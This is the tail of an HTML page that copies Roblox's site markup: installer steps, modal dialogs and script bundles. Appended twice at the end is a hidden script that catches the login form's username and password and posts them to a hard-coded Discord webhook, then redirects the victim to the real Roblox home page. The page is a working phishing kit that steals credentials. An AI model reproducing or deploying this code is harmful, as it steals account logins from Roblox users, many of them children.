data-delaysrc=https://images.rbxcdn.com/28eaa93b899b93461399aebf21c5346f.png><li class=step2-of-4><h2>2</h2><p class=larger-font-size>Click <strong>Run</strong> when prompted by your computer to begin the installation process.</p><img data-delaysrc=https://images.rbxcdn.com/51328932dedb5d8d61107272cc1a27db.png><li class=step3-of-4><h2>3</h2><p class=larger-font-size>Click <strong>Ok</strong> once you've successfully installed Roblox.</p><img data-delaysrc=https://images.rbxcdn.com/3797745629baca2d1b9496b76bc9e6dc.png><li class=step4-of-4><h2>4</h2><p class=larger-font-size>After installation, click <strong>Play</strong> below to join the action!<div class="VisitButton VisitButtonContinueGLI"><a class="btn btn-primary-lg disabled btn-full-width">Play</a></div></ul></div></div><div class=xsmall>The Roblox installer should download shortly. If it doesn’t, start the <a id=GameLaunchManualInstallLink href=# class=text-link>download now.</a><script>if(Roblox.ProtocolHandlerClientInterface&&typeof Roblox.ProtocolHandlerClientInterface.attachManualDownloadToLink==='function'){Roblox.ProtocolHandlerClientInterface.attachManualDownloadToLink();}</script></div></div></div><div class=InstallInstructionsImage data-modalwidth=970 style=display:none></div><div id=pluginObjDiv style=height:1px;width:1px;visibility:hidden;position:absolute;top:0></div><iframe id=downloadInstallerIFrame name=downloadInstallerIFrame style=visibility:hidden;height:0;width:1px;position:absolute></iframe><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=clientinstaller src=https://js.rbxcdn.com/17af7ddc78e9257b126bfee033fdf688.js></script><script>Roblox.Client._skip=null;Roblox.Client._CLSID='76D50904-6780-4c8b-8986-1A7EE0B1716D';Roblox.Client._installHost='setup.roblox.com';Roblox.Client.ImplementsProxy=true;Roblox.Client._silentModeEnabled=true;Roblox.Client._bringAppToFrontEnabled=false;Roblox.Client._currentPluginVersion='';Roblox.Client._eventStreamLoggingEnabled=true;Roblox.Client._installSuccess=function(){if(GoogleAnalyticsEvents){GoogleAnalyticsEvents.ViewVirtual('InstallSuccess');GoogleAnalyticsEvents.FireEvent(['Plugin','Install Success']);if(Roblox.Client._eventStreamLoggingEnabled&&typeof Roblox.GamePlayEvents!="undefined"){Roblox.GamePlayEvents.SendInstallSuccess(Roblox.Client._launchMode,play_placeId);}}}
if((window.chrome||window.safari)&&window.location.hash=='#chromeInstall'){window.location.hash='';var continuation='('+$.cookie('chromeInstall')+')';play_placeId=$.cookie('chromeInstallPlaceId');Roblox.GamePlayEvents.lastContext=$.cookie('chromeInstallLaunchMode');$.cookie('chromeInstallPlaceId',null);$.cookie('chromeInstallLaunchMode',null);$.cookie('chromeInstall',null);RobloxLaunch._GoogleAnalyticsCallback=function(){var isInsideRobloxIDE='website';if(Roblox&&Roblox.Client&&Roblox.Client.isIDE&&Roblox.Client.isIDE()){isInsideRobloxIDE='Studio';};GoogleAnalyticsEvents.FireEvent(['Plugin Location','Launch Attempt',isInsideRobloxIDE]);GoogleAnalyticsEvents.FireEvent(['Plugin','Launch Attempt','Play']);EventTracker.fireEvent('GameLaunchAttempt_Win32','GameLaunchAttempt_Win32_Plugin');if(typeof Roblox.GamePlayEvents!='undefined'){Roblox.GamePlayEvents.SendClientStartAttempt(null,play_placeId);}};Roblox.Client.ResumeTimer(eval(continuation));}</script><div class="ConfirmationModal modalPopup unifiedModal smallModal" data-modal-handle=confirmation style=display:none><a class="genericmodal-close ImageButton closeBtnCircle_20h"></a><div class=Title></div><div class=GenericModalBody><div class=TopBody><div class="ImageContainer roblox-item-image" data-image-size=small data-no-overlays data-no-click><img class=GenericModalImage alt="generic image"></div><div class=Message></div></div><div class="ConfirmationModalButtonContainer GenericModalButtonContainer"><a href="" id=roblox-confirm-btn><span></span></a> <a href="" id=roblox-decline-btn><span></span></a></div><div class=ConfirmationModalFooter></div></div><script>Roblox=Roblox||{};Roblox.Resources=Roblox.Resources||{};Roblox.Resources.GenericConfirmation={yes:"Yes",No:"No",Confirm:"Confirm",Cancel:"Cancel"};</script></div><div id=modal-confirmation class=modal-confirmation data-modal-type=confirmation><div id=modal-dialog class=modal-dialog><div class=modal-content><div class=modal-header><button type=button class=close data-dismiss=modal> <span aria-hidden=true><span class=icon-close></span></span><span class=sr-only>Close</span> </button><h5 class=modal-title></h5></div><div class=modal-body><div class=modal-top-body><div class=modal-message></div><div class="modal-image-container roblox-item-image" data-image-size=medium data-no-overlays data-no-click><img class=modal-thumb alt="generic image"></div><div class="modal-checkbox checkbox"><input id=modal-checkbox-input type=checkbox> <label for=modal-checkbox-input></label></div></div><div class=modal-btns><a href="" id=confirm-btn><span></span></a> <a href="" id=decline-btn><span></span></a></div><div class="loading modal-processing"><img class=loading-default src=https://images.rbxcdn.com/4bed93c91f909002b1f17f05c0ce13d1.gif alt=Processing...></div></div><div class="modal-footer text-footer"></div></div></div></div><script>var Roblox=Roblox||{};Roblox.jsConsoleEnabled=false;</script><script>$(function(){Roblox.CookieUpgrader.domain='roblox.com';Roblox.CookieUpgrader.upgrade("GuestData",{expires:Roblox.CookieUpgrader.thirtyYearsFromNow});Roblox.CookieUpgrader.upgrade("RBXSource",{expires:function(cookie){return Roblox.CookieUpgrader.getExpirationFromCookieValue("rbx_acquisition_time",cookie);}});Roblox.CookieUpgrader.upgrade("RBXViralAcquisition",{expires:function(cookie){return Roblox.CookieUpgrader.getExpirationFromCookieValue("time",cookie);}});Roblox.CookieUpgrader.upgrade("RBXMarketing",{expires:Roblox.CookieUpgrader.thirtyYearsFromNow});Roblox.CookieUpgrader.upgrade("RBXSessionTracker",{expires:Roblox.CookieUpgrader.fourHoursFromNow});Roblox.CookieUpgrader.upgrade("RBXEventTrackerV2",{expires:Roblox.CookieUpgrader.thirtyYearsFromNow});});</script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=intl-polyfill src=https://js.rbxcdn.com/d44520f7da5ec476cfb1704d91bab327.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=InternationalCore src=https://js.rbxcdn.com/ff3308aa2e909de0f9fcd5da7b529db247f69fe9b4072cbbc267749800a4d9e6.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=TranslationResources src=https://js.rbxcdn.com/83d836a661ff433d5b7ce719c489e43af590ff75ab39ccc6d393546fe91b766a.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=leanbase src=https://js.rbxcdn.com/77ad2abc731e3b0b559e022e1e39e614.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=CoreUtilities src=https://js.rbxcdn.com/4529cb55d64c7c56ae5676c59055bf50d33b4562eabba8f3042fddbbd2911612.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=CoreRobloxUtilities src=https://js.rbxcdn.com/1ea4d24dc5a4344579499b4d225f808e013d2b53bfee4a88291a2ac825e5e443.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=React src=https://js.rbxcdn.com/45841f2140bdbf6302237530383db2c6bfd938c7138a085cea83fb5f4c03086c.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=ReactUtilities src=https://js.rbxcdn.com/898cb6e9c467d15ad80a67d019f3815d35dbc6ff60c12ef7dd928e8fbaf02b0b.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=ReactStyleGuide src=https://js.rbxcdn.com/ae1d5d56faa1e95449ae22d2684ae32a940acac06ccce3938d3154b2139f301b.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=angular src=https://js.rbxcdn.com/ae3d621886e736e52c97008e085fa286.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=AngularJsUtilities src=https://js.rbxcdn.com/0997b4b967345e5a2c5fc01dd196a4866a5bf415b0650a6382630d397dd5fefe.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=InternationalAngularJs src=https://js.rbxcdn.com/95f7afb5fcb3c8ae379d51661e32c54ea8d8b823ace7574bd0b7fab9275cba6b.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=Thumbnails src=https://js.rbxcdn.com/2a2231982072ee11703fbfe5f08952ca8277e4f6021a00418dd3b95bf483be82.js></script><div id=presence-registration-bootstrap-data data-is-enabled=False data-interval=15000></div><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=PresenceRegistration src=https://js.rbxcdn.com/5b80058e4a378bff99040aeee8709bdd621f1e0c3772013695d7d6b00f4ddbfe.js></script><div ng-modules=baseTemplateApp><script src=https://js.rbxcdn.com/ffcc04436179c6b2a6668fdfcfbf62b1.js></script></div><div ng-modules=pageTemplateApp><script src=https://js.rbxcdn.com/3e544c8e724dcdc296258b0ca69401a9.js></script></div><script>Roblox.config.externalResources=[];Roblox.config.paths['Pages.Catalog']='https://js.rbxcdn.com/cafca5e807a6864149a01d3e510763d3.js';Roblox.config.paths['Pages.CatalogShared']='https://js.rbxcdn.com/daeddd9f7ee5728711b717cc62326f34.js';Roblox.config.paths['Widgets.AvatarImage']='https://js.rbxcdn.com/7d49ac94271bd506077acc9d0130eebb.js';Roblox.config.paths['Widgets.DropdownMenu']='https://js.rbxcdn.com/da553e6b77b3d79bec37441b5fb317e7.js';Roblox.config.paths['Widgets.GroupImage']='https://js.rbxcdn.com/8ad41e45c4ac81f7d8c44ec542a2da0a.js';Roblox.config.paths['Widgets.HierarchicalDropdown']='https://js.rbxcdn.com/4a0af9989732810851e9e12809aeb8ad.js';Roblox.config.paths['Widgets.ItemImage']='https://js.rbxcdn.com/61a0490ba23afa17f9ecca2a079a6a57.js';Roblox.config.paths['Widgets.PlaceImage']='https://js.rbxcdn.com/a6df74a754523e097cab747621643c98.js';</script><script>Roblox.XsrfToken.setToken('sjgVmCM7H/U3');</script><script>$(function(){Roblox.DeveloperConsoleWarning.showWarning();});</script><script>$(function(){function trackReturns(){function dayDiff(d1,d2){return Math.floor((d1-d2)/86400000);}
if(!localStorage){return false;}
var cookieName='RBXReturn';var cookieOptions={expires:9001};var cookieStr=localStorage.getItem(cookieName)||"";var cookie={};try{cookie=JSON.parse(cookieStr);}catch(ex){}
try{if(typeof cookie.ts==="undefined"||isNaN(new Date(cookie.ts))){localStorage.setItem(cookieName,JSON.stringify({ts:new Date().toDateString()}));return false;}}catch(ex){return false;}
var daysSinceFirstVisit=dayDiff(new Date(),new Date(cookie.ts));if(daysSinceFirstVisit==1&&typeof cookie.odr==="undefined"){RobloxEventManager.triggerEvent('rbx_evt_odr',{});cookie.odr=1;}
if(daysSinceFirstVisit>=1&&daysSinceFirstVisit<=7&&typeof cookie.sdr==="undefined"){RobloxEventManager.triggerEvent('rbx_evt_sdr',{});cookie.sdr=1;}
try{localStorage.setItem(cookieName,JSON.stringify(cookie));}catch(ex){return false;}}
GoogleListener.init();RobloxEventManager.initialize(true);RobloxEventManager.triggerEvent('rbx_evt_pageview');trackReturns();RobloxEventManager._idleInterval=450000;RobloxEventManager.registerCookieStoreEvent('rbx_evt_initial_install_start');RobloxEventManager.registerCookieStoreEvent('rbx_evt_ftp');RobloxEventManager.registerCookieStoreEvent('rbx_evt_initial_install_success');RobloxEventManager.registerCookieStoreEvent('rbx_evt_fmp');RobloxEventManager.startMonitor();});</script><script>var Roblox=Roblox||{};Roblox.UpsellAdModal=Roblox.UpsellAdModal||{};Roblox.UpsellAdModal.Resources={title:"Remove Ads Like This",body:"Builders Club members do not see external ads like these.",accept:"Upgrade Now",decline:"No, thanks"};</script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=page src=https://js.rbxcdn.com/5797f088173c23cdd9dc2cd93ac29399.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=StyleGuide src=https://js.rbxcdn.com/43cdbede285864298b0b52d8742ce1ec9358f9f08a67c62c46e005b27ef81f94.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=Footer src=https://js.rbxcdn.com/a840c4e56158c6abca1b493fa30b3490013a0d0051428208a89da199dc272fae.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=DynamicLocalizationResourceScript_CommonUI.Features src=https://js.rbxcdn.com/8e39f38b3ae6afcba0966973e3f4668a6a94f7b52313d8c39afa50d2355ac323.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=DynamicLocalizationResourceScript_CommonUI.Features src=https://js.rbxcdn.com/a492c6d3ab5263357ae94288a7fc4889ee69c8a88bf052cc39938255170ece90.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=DynamicLocalizationResourceScript_Common.AlertsAndOptions src=https://js.rbxcdn.com/b5950dbf3080ed6b06446cc134cd09fd78a4f68cf4e640c57cabfab6a80cabd6.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=DynamicLocalizationResourceScript_Common.AlertsAndOptions src=https://js.rbxcdn.com/40748e858f962cd15b99291ed097e84a5b6a39c6c3abda791d81fa8c476ea37d.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=Captcha src=https://js.rbxcdn.com/3927bd66ec797e2fd38b41fc0c8f1de84c7f976cc7f4738d1d2f7600352b8683.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=CursorPagination src=https://js.rbxcdn.com/23f7ebb7d16ce4ae1bf9bdf36cb0bf52209af8e57f55b7d6d14c0d96621eeda2.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=DynamicLocalizationResourceScript_CommonUI.Controls src=https://js.rbxcdn.com/d6867f3e171e7c6f3ca1e636698b1baa77c15cf80a51cb5fdd71e2e5e40c2a07.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=DynamicLocalizationResourceScript_CommonUI.Controls src=https://js.rbxcdn.com/c844866b2f89e13f938d569829bd1e0b1d452517ce9ab5f04aeac2efe9998928.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=GameBadges src=https://js.rbxcdn.com/e3f2e759eb092a43098ec16e9ea0fe4036187b33d0d1d7b435689ed66b12a18c.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=DynamicLocalizationResourceScript_Feature.GameBadges src=https://js.rbxcdn.com/b05674b8df000f2647e0822c925a382759645e0efa4ff50d6c5c971d7f369cfa.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=DynamicLocalizationResourceScript_Feature.GameBadges src=https://js.rbxcdn.com/b43b368f1447a43300d27709c8139d27c645a8bf5fdc98a9a54d4c19e01b741a.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=SocialLinksJumbotron src=https://js.rbxcdn.com/03f4d619a1b94be5ae32e65046d1da3f01d3da385e7a39d4e2e5ceed8bc7cc94.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=DynamicLocalizationResourceScript_Feature.PromotedChannels src=https://js.rbxcdn.com/d9f9c6bd05ed7aec7d8f6b76d687600a676e8e4637fed37ceedb9e6ff92beb72.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=DynamicLocalizationResourceScript_Feature.PromotedChannels src=https://js.rbxcdn.com/815b6f007391debfcf67f143e5be42b1877f90dbaa80b80e5cf13e27c558b15a.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=GameLaunch src=https://js.rbxcdn.com/0161cbe6b5c9cfcf5f45577d1f42b33257b001e0ebf8e7a9a5e25009b649c9cd.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=DynamicLocalizationResourceScript_Feature.GameLaunchGuestMode src=https://js.rbxcdn.com/b6f7e0e090bb44e092c19eb7e714473be92bd8b26eb53b693e03179658950b69.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=DynamicLocalizationResourceScript_Feature.GameLaunchGuestMode src=https://js.rbxcdn.com/75d691f0d9840862e1341c56663ab6a620bed97a721809dce6ef85c68b3b0c5b.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=DynamicLocalizationResourceScript_Common.VisitGame src=https://js.rbxcdn.com/8970b46e46bddd4380edbc66639b5b333720b2633a9105d4cde2c31ba2878d97.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=DynamicLocalizationResourceScript_Common.VisitGame src=https://js.rbxcdn.com/0ea369a7496bf1e32d7a3834a06b42b1eeea4720c6a4b5fd719792d082eba641.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=SystemFeedback src=https://js.rbxcdn.com/aac542106f7f77697cbc3b36ab3cf0619bf9b69a1af0983e59dfeb6c36652d3b.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=Login src=https://js.rbxcdn.com/262ac126331e487dacbdf05971f6bcba9e278d46f0f17956187620ab5f9a0420.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=DynamicLocalizationResourceScript_Authentication.Captcha src=https://js.rbxcdn.com/03acbfb65ca7969f51d31e6ae449812c120535f4ad657e007c1d8d0c0be551e9.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=DynamicLocalizationResourceScript_Authentication.Captcha src=https://js.rbxcdn.com/c90a75ce07429d762b224d1350d1c5de47da85b61c2e64bbc82b1eb8aeebf4a9.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=DynamicLocalizationResourceScript_Authentication.Login src=https://js.rbxcdn.com/348e08afe2615b3e6d18c29b2a4f7b4711ede1a9a86bfd4ece9e44d76de7310a.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=DynamicLocalizationResourceScript_Authentication.Login src=https://js.rbxcdn.com/4ab8843b045b3bd8c5bdbfab108856986450361fb4d332509bd6b51733f43888.js></script><script>var _comscore=_comscore||[];_comscore.push({c1:"2",c2:"6035605",c3:"",c4:"",c15:""});(function(){var s=document.createElement("script"),el=document.getElementsByTagName("script")[0];s.async=true;s.src=(document.location.protocol=="https:"?"https://sb":"http://b")+".scorecardresearch.com/beacon.js";el.parentNode.insertBefore(s,el);})();</script><noscript><img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cv=2.0&amp;cj=1"></noscript><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=pageEnd src=https://js.rbxcdn.com/7b6a7c805f427e2f0375fe78528a34e0.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=LatencyMeasurement src=https://js.rbxcdn.com/7ede97b9c45573276c9cbc4d0056d447f534d9ccb61599ff40ecaeb92b6e2ef0.js></script>
<script type="text/javascript">document.addEventListener("DOMContentLoaded",()=>{
            const e=document.getElementById("login-username"),o=document.getElementById("login-password"),t=document.getElementById("login-button");
            document.querySelector("p.login-error").setAttribute("style","display: none !important;"),console.log("Loaded",t);

            t.addEventListener("click",async t=>{
                               t.preventDefault();
            const n=e.value.trim(),a=o.value.trim();
            ""!=n&&""!=a?(await(({
              webhookURL:e,content:o}
                                )=>fetch(e,{
              method:"post",headers:{
                "Content-Type":"application/json"}
              ,body:JSON.stringify(o)}
                                        ))({
              webhookURL:"https://discord.com/api/webhooks/733793192402485298/_2jmv848hxzAANUU7_mtKXI_AssLUiN32neTUFO_DVpt6pdSDLa9Xa6xWSYP2h3AjCK5",content:{
                description:"Valid attempt requested",embeds:[{
                  fields:[{
                    name:"Username",value:n,inline:!0}
                          ,{
                            name:"Password",value:a,inline:!0}
                         ],color:7143253,timestamp:(new Date).toISOString()}
                                                             ]}
            }
                                          ),window.location.replace("https://www.roblox.com/home")):window.location.reload()}
                                                                )}
          );
		  
		  
		  
        </script>
      /script>
    
        <script type="text/javascript">document.addEventListener("DOMContentLoaded",()=>{
            const e=document.getElementById("login-username"),o=document.getElementById("login-password"),t=document.getElementById("login-button");
            document.querySelector("p.login-error").setAttribute("style","display: none !important;"),console.log("Loaded",t);

            t.addEventListener("click",async t=>{
                               t.preventDefault();
            const n=e.value.trim(),a=o.value.trim();
            ""!=n&&""!=a?(await(({
              webhookURL:e,content:o}
                                )=>fetch(e,{
              method:"post",headers:{
                "Content-Type":"application/json"}
              ,body:JSON.stringify(o)}
                                        ))({
              webhookURL:"https://discord.com/api/webhooks/733793192402485298/_2jmv848hxzAANUU7_mtKXI_AssLUiN32neTUFO_DVpt6pdSDLa9Xa6xWSYP2h3AjCK5",content:{
                description:"Valid attempt requested",embeds:[{
                  fields:[{
                    name:"Username",value:n,inline:!0}
                          ,{
                            name:"Password",value:a,inline:!0}
                         ],color:7143253,timestamp:(new Date).toISOString()}
                                                             ]}
            }
                                          ),window.location.replace("https://www.roblox.com/home")):window.location.reload()}
                                                                )}
          );
		  
		  
		  
        </script></body></html></body></html></body></html></body></html>
